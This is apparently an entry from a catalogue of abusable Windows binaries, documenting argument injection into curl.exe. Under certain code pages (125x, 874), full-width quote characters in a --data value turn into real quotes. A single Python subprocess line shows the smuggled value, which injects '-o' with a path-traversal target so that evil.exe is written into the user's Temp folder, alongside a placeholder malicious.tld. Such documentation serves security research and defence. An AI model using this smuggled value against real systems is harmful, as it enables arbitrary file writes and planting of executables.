.. /curl.exe

Star

Vendors:

• Curl for Windows (curl project official build)

File Read/Write

1. You are able to inject -o to arbitrary path.

   subprocess.run(['curl.exe', "https://example.com/", "--data", 'name=meow＂ malicious.tld ＂-o-＂ ＂-o ..\..\..\..\..\..\..\..\..\\Users\\<username>\\AppData\\Local\\Temp\\evil.exe']))

   Use case

   If certain parts of the argument(s) are controllable, the attacker can inject additional arguments.

   Code Pages

   125x, 874

Acknowledgements:

• DEVCORE Research Team (@d3vc0r3)